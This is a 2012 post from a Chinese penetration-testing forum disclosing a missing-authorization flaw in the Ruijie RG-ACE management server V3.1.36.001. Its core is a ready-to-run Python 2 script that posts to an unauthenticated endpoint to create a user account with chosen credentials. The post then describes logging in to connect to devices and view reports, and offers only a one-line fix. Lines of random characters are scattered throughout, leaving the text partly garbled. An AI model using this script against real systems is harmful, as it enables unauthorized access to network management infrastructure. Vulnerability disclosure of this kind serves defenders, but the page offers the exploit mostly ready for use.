中国网络渗透测试联盟
标题:
锐捷应用控制引擎管理服务器可以增加用户
[打印本页]
作者:
admin
时间:
2012-12-10 10:16
标题:
锐捷应用控制引擎管理服务器可以增加用户
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接
http://www.ruijie.com.cn/service/down-search.aspx
显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
) e1 p4 z( e2 G
# q& ~! D2 n/ b, I# Z$ r) w: T: w# `
5 I; ^$ Q: Y, V- W' ~$ ~
测试的具体版本是
! @) d4 b |2 r& F+ y; Q6 O! k
产品名称: 锐捷应用控制引擎
+ H' X2 `) j7 w, p, X
版本号: 3.1.36.001 TC
" T5 q8 R7 ]9 s& K
编译时间: 201104291730
. P/ m5 J, b# K9 D7 p
# `& H/ \, Z7 T1 d3 R2 s
5 }. n1 ]/ _- E3 Z1 f& ~
漏洞证明:
8 u) y7 ^* D( Y8 w* o' Z* O
$ |; L- ^2 B! r. _2 V8 h
7 U, Y: ~3 L$ P. x' }( ~
+ @' m, [! v" ~+ B
) h0 p5 C1 v- _: g$ h* q( r1 G
% ]4 U4 H% I' [% c
- A2 q+ Q$ N6 d+ i+ u; r
执行脚本
5 [" Q+ b2 j: f: K% Q V
#! /usr/bin/env python
5 b8 X9 { p5 Q9 a# \) B7 `
#coding=gbk
% o0 r3 g9 l n0 ?9 N2 a0 x
#RG-ACE管理服务器 V3.1.36.001
* i7 l* m- X, J( l4 F7 g# J7 J
import urllib2, urllib,cookielib
( j- A8 _0 K( B- ^1 ]" q' ~$ K1 P# r
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
" N' E0 C+ W# z
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
5 f1 E/ A) I' r4 M$ q
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
: i4 O: B z; I
post=(("event","userManager.doInsertUserInfo"),
4 \) k4 m1 [9 M* q
("useractionname","addButtonValue"),
+ _3 D2 d) h2 t) q# Z# p
("useropermanager","userManager"),
4 @$ f/ x6 N2 p- D7 F1 k# U
("userName","t"), #######账号自己加
5 s! y. V8 F* |# i* o! r6 u) R
("pwd","aaaaaa"),######密码自己加
2 {& F9 \4 [1 ^0 {9 G- i- i3 Y9 W3 A
("trueName","ad"),
6 o' z" B2 J* Z& B7 o; u: s
("email",""),
7 O$ r( U2 N$ z6 m( v j
("mobilePhone",""),
?0 g/ `4 k1 G6 @) \6 v: m9 G
("officePhone",""),
7 Z# r$ K! T* ]$ ~; i
("addr",""),
0 o7 n) ]2 a2 K+ |
("submit","确定"))
7 h- ?6 Q9 D+ R! R, X, b n
urllib2.install_opener(opener)
4 v0 O0 j/ R4 `: P
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
1 q1 P2 D, k2 H/ B
print "Done"
. w; i, }/ S) R8 D! R7 P. T- }
& R" Q' ^( c8 z2 t8 j6 A/ T
登录,连接设备
1 c+ i' @1 q; f
3 H7 ` Z+ y% s$ r
8 _$ j* g! R* D; V5 \; a& F
$ X3 |1 Y8 l0 M
9 N+ ]& z# |$ y, K) M
9 T9 M* v [6 t4 q. _
默认的管理员admin权限更大点
3 @. ~( U) B @1 \4 U$ V
* g* R" a0 X' h
0 a0 E. D/ A: Y
: Q4 I( @. ?5 D4 q) J$ r; @ [& x& m
d5 E3 ~) x7 e" k
# K/ \! f2 N( S* D2 [
修复方案:
1 b! V" n. N7 V3 D5 R% Q; _( n
加强对接口的权限验证
# L8 U# W+ V$ r3 J
' B7 O" H( f7 @
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2